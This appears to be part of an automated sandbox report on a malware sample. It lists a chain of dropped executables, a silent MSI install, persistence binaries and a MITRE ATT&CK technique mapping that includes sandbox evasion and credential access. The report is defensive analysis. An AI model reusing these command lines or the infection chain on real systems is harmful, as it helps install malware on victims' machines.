                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7336
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      ping -n 1 -w 1000 8.8.8.8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:8060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\10127020101\3wQAlfL.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10127020101\3wQAlfL.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8428
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10127030101\ra02W4S.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10127030101\ra02W4S.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:9340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10127040101\08IyOOF.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10127040101\08IyOOF.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:11092
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10127050271\OQKXONWK.msi" /quiet
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\d610cf342e\ramez.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\Win-v43.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\Win-v43.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\Win-v43.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7876
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11212
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Diphtheria\SF32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Diphtheria\SF32.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\ProgramData\psh_ultra\SF32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\ProgramData\psh_ultra\SF32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\AdaptiveDisp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\ProgramData\AdaptiveDisp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10980

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Reconnaissance

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Resource Development

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Initial Access

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1059

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PowerShell

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1059.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Power Settings

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1653

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Privilege Escalation

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1547

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1547.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task/Job

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Scheduled Task

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1053.005

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1222

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Windows File and Directory Permissions Modification

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1222.001

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              T1497

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Credential Access

